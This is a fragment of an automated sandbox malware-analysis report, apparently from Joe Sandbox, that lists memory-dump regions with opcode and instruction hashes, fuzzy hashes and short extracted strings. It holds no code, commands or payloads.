                              • Opcode ID: b4f2c86791f548c60557f404df34c15814493b83ee60ccbf3dca8833877d1dca
                              • Instruction ID: ec90ad517b2381a407e85fb5bd762c5c1b06fdf24d923f80aed01b99a3a6578f
                              • Opcode Fuzzy Hash: b4f2c86791f548c60557f404df34c15814493b83ee60ccbf3dca8833877d1dca
                              • Instruction Fuzzy Hash: 365158A1E0E7CA4FF3798B7445625E93B90EF92390F0606BEE48D875F7EE2452168341
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: :"q$(:"q$(c"q$0:"q$8:"q$@:"q$H:"q$P:"q$X:"q$`:"q$h:"q$p:"q$9"q$9"q
                              • API String ID: 0-3230101368
                              • Opcode ID: 5a47255b64aecb7284419e01d9446c3af85d1197c4798c7550d3ed2c06cadba5
                              • Instruction ID: 103fea3a017273cbcf9a45b2b0c2608a59a98396244bcdb2c0be5c2d30070b2c
                              • Opcode Fuzzy Hash: 5a47255b64aecb7284419e01d9446c3af85d1197c4798c7550d3ed2c06cadba5
                              • Instruction Fuzzy Hash: 52B1A13060DA9AAFC729D7B05C13AC9BEE0BF06356F254BF9E0469F0E3C5A80885C711
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 9"q$(9"q$09"q$89"q$@9"q$H9"q$P8"q$P9"q$h8"q$p8"q$x8"q$8"q$8"q
                              • API String ID: 0-2555976747
                              • Opcode ID: f8d5c77ab2c103be1f13593d2d2f933e4a2efde62393642fcc3ccfef705e3b35
                              • Instruction ID: d7ec57cbf75dc555a0619c9cebc1efec40a713291a8dcd640c201cfaea3eef64
                              • Opcode Fuzzy Hash: f8d5c77ab2c103be1f13593d2d2f933e4a2efde62393642fcc3ccfef705e3b35
                              • Instruction Fuzzy Hash: 59C1C460A0FA9E6FC76A97B908678CD7FE09F1636172607EEE0459F0A3D8CC4906C711
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: :"q$(:"q$(c"q$0:"q$8:"q$@:"q$H:"q$P:"q$X:"q$`:"q$h:"q$p:"q
                              • API String ID: 0-1764029368
                              • Opcode ID: f9ccbb962643323b9f78320defd71b79f6ac58e0a27e70a4c1bc611670794b86
                              • Instruction ID: adcdfd4f1aeca386f0c9ef35023d5b9b647fa2b86461e9070aa291572540d5b9
                              • Opcode Fuzzy Hash: f9ccbb962643323b9f78320defd71b79f6ac58e0a27e70a4c1bc611670794b86
                              • Instruction Fuzzy Hash: 6161813061DA9A9FC729D7B55C13AC9BAE0BF05366F254BF9E0469F0E3C5980886C711
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 9"q$(9"q$09"q$89"q$@9"q$H9"q$P8"q$P9"q$8"q$8"q
                              • API String ID: 0-1225446884
                              • Opcode ID: 916c1de00ae7690e855c42519829bdecc1739488e915c3ac3fe51fb9dd0fd8b2
                              • Instruction ID: 91d775db718e304d6e5970dafc9799f7efa10f36da2ff3a270f5c0ef74647204
                              • Opcode Fuzzy Hash: 916c1de00ae7690e855c42519829bdecc1739488e915c3ac3fe51fb9dd0fd8b2
                              • Instruction Fuzzy Hash: 1BC1E560A0FBCEAFC76693B904669CA7FE09F1736572607EEE0459F0A3D89D4906C311
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: c"q$P9"q$X9"q$`9"q$h9"q$p9"q$x9"q$9"q$9"q
                              • API String ID: 0-335902523
                              • Opcode ID: 9a083ed6f5cf87399d1a487b6874de551eae7f4b38b3e4c0bc09cb301cdd4a2b
                              • Instruction ID: dc3cadd9a9d2084cce17527ed4c95e66a936e49bb3fdaad3db270e85982e2165
                              • Opcode Fuzzy Hash: 9a083ed6f5cf87399d1a487b6874de551eae7f4b38b3e4c0bc09cb301cdd4a2b
                              • Instruction Fuzzy Hash: 54B1A82060E6DE9FC72A97B448239C9BFE0AF0B356B260BFAD0459F0E3D99C1945C711
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ["q$ ["q$ ["q$ ["q$ ["q$ ["q$ ["q$["q/
                              • API String ID: 0-1954448781
                              • Opcode ID: cb4006b6d8caaa48a62d77804c038256d3c5b1cbf664a9a0fbb33fbcb1da6a8f
                              • Instruction ID: fee74ab5d8a5716f5605573ceebff897dbee85377d497bdd2681745f4491ea50
                              • Opcode Fuzzy Hash: cb4006b6d8caaa48a62d77804c038256d3c5b1cbf664a9a0fbb33fbcb1da6a8f
                              • Instruction Fuzzy Hash: 02D13B61A0FACA4FD7A5977848292D97FE1FF96264B0945FED085CB0EBE9685C06C300
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: c"q$`9"q$h9"q$p9"q$x9"q$9"q$9"q
                              • API String ID: 0-3311819698
                              • Opcode ID: 43c049e2b86961d4c1e6a75082129161a6c29d33aad7f7c179d0e0af7f7e9c23
                              • Instruction ID: 212cd969c23e44e92cd412a6819e9554a3dfb626d5523e56f60aa0025b6253b2
                              • Opcode Fuzzy Hash: 43c049e2b86961d4c1e6a75082129161a6c29d33aad7f7c179d0e0af7f7e9c23
                              • Instruction Fuzzy Hash: 8081792060EA9AAFC76AD7B548239CDBFE0AF06356B250BFAD0459F0E3D99C0845C711
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 0c"q$Hc"q$KDBM$Pc"q$Xc"q$`c"q$hc"q
                              • API String ID: 0-3044960168
                              • Opcode ID: 99e766c15bf60bb20389b6250cb1a959d2e9c45e15bcb75ada82311975621cb8
                              • Instruction ID: 47d2ad56dc5acb63f5ac18dff1e51064267586bdfea8141f42055b588de394ed
                              • Opcode Fuzzy Hash: 99e766c15bf60bb20389b6250cb1a959d2e9c45e15bcb75ada82311975621cb8
                              • Instruction Fuzzy Hash: AC51597264F7CA4FD3238FF484A50E57BE0FF9632071945EAC4848B1A6E6AD5D86C710
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: K_^$K_^$K_^$K_^$K_^
                              • API String ID: 0-1778473158
                              • Opcode ID: 92517878f553930e111ffb8e52839c7f135ac55b726c345386758a7402fb08db
                              • Instruction ID: 7dc50d2cd11c1ba00642c6cd66931f7f80e81bcf83e9f98ee32546992e763e5a
                              • Opcode Fuzzy Hash: 92517878f553930e111ffb8e52839c7f135ac55b726c345386758a7402fb08db
                              • Instruction Fuzzy Hash: 0931F8F3E1A98E0BEBA50B5D5C6A0E43BD0FF60A7C74603B6E4A89B063FD1536074141
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: K_^4$K_^5$K_^6$K_^?$K_^@
                              • API String ID: 0-538154125
                              • Opcode ID: 3fecba1278ac18b4fd634e32b38daf05b4fa41303905216f4c26a3e350bc6b3b
                              • Instruction ID: da6ece5a52ff15f5fc49a7bda636406cfe17c1f8849f92d54d4eeefa0cb82b70
                              • Opcode Fuzzy Hash: 3fecba1278ac18b4fd634e32b38daf05b4fa41303905216f4c26a3e350bc6b3b
                              • Instruction Fuzzy Hash: B321E077B085155E9B16BABCB8614E837A0DFA823F74843FBE4E9CE083DD15208786C4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: K_^$K_^$K_^$K_^
                              • API String ID: 0-1134090584
                              • Opcode ID: 2db6372ef0f02313d3e8b8b4f9791d5a80a7a2bbc84c1213879cd16c4f4cf8e7
                              • Instruction ID: bcdcf9808a855c4773d793ef041c3fd1187abb70fade43bac00039883c3edd4e
                              • Opcode Fuzzy Hash: 2db6372ef0f02313d3e8b8b4f9791d5a80a7a2bbc84c1213879cd16c4f4cf8e7
                              • Instruction Fuzzy Hash: AF21A6B3E0B5C91BEB659B5D68660E43B90FFA067D74903B7D4A88F053FD1436068245
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: L_^0$L_^2$L_^4$L_^6
                              • API String ID: 0-2047270763
                              • Opcode ID: 7ff69ff954960246898db6f8392c9e3b0656f18a0b5d234f444cade3e08a98e0
                              • Instruction ID: 640f8808f629fc634a840e1970b03facccb8cf81b8fb259eea73db9485eaf118
                              • Opcode Fuzzy Hash: 7ff69ff954960246898db6f8392c9e3b0656f18a0b5d234f444cade3e08a98e0
                              • Instruction Fuzzy Hash: 0AD012FE9100280DD6021CA618E04EC1B84860137DB203AA3D777D9103CB51D2C3D040
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: L_^0$L_^2$L_^4$L_^6
                              • API String ID: 0-2047270763
                              • Opcode ID: d90a10634a7569a9da6b03dbebb3bb10331e8b5eb83a67a642f421c0b94b6a51
                              • Instruction ID: 0d2443713a10b4496ce575e03b45355f8bd582c3017793c7b3a204bdf04c8cff
                              • Opcode Fuzzy Hash: d90a10634a7569a9da6b03dbebb3bb10331e8b5eb83a67a642f421c0b94b6a51
                              • Instruction Fuzzy Hash: A4900202518092009315A56824614E45B114E1A13F60846E2E4D90C087680520858144
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1777395641.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd9baa0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID: /G^
                              • API String ID: 0-4060741715
                              • Opcode ID: ff0065ba0ae784c002951ab2acc0aa35ad142a221c2a517443f910198f2fd282
                              • Instruction ID: 1b855302abaf3841eedffb486e875a20bb4e66e1d208004a4fbe415da01a8892
                              • Opcode Fuzzy Hash: ff0065ba0ae784c002951ab2acc0aa35ad142a221c2a517443f910198f2fd282
                              • Instruction Fuzzy Hash: E931AE32A0F7D20FE3674BBDA8660A43FE5EF1363070A01FBC0C58A0A3E44A19468371
                              Memory Dump Source
                              • Source File: 00000005.00000002.1777395641.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd9baa0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d1315cf84c9204ac922202315866a6bcc049e55ca8b2d5976bd4ad606e936512
                              • Instruction ID: efa55c218aec9ec6ec15af0ee09fa6ae4cca256525d70eec4e3bced61f08e149
                              • Opcode Fuzzy Hash: d1315cf84c9204ac922202315866a6bcc049e55ca8b2d5976bd4ad606e936512
                              • Instruction Fuzzy Hash: A6415D31A0DB884FDB18DF5C985A6B8BBE1FB55310F00416FE44983292DB70B951C7D2
                              Memory Dump Source
                              • Source File: 00000005.00000002.1777005943.00007FFD9B98D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B98D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd9b98d000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3796744b55e6d8a2ecf154d20b020f15c76203ccf9f9cd07fdaad43e1c2c6fdf
                              • Instruction ID: 7441f383d28bec7f8d1e84e8a7902733bd10efeaae2b8b0d6c9672625cc91d77
                              • Opcode Fuzzy Hash: 3796744b55e6d8a2ecf154d20b020f15c76203ccf9f9cd07fdaad43e1c2c6fdf
                              • Instruction Fuzzy Hash: EC41157190EFC85FE766CB3998659523FB0EF52310B1605EFD088CB1A3D625A846C792
                              Memory Dump Source
                              • Source File: 00000005.00000002.1777395641.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd9baa0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                              • Instruction ID: fe27c77d210453ff9ac8e18656f571fdffb2d1ba2cecbf8df11bf048f1b1a8d7
                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                              • Instruction Fuzzy Hash: 5B01677121CB0C4FD748EF0CE451AA5B7E0FF95364F10056DE58AC76A5DA36E882CB45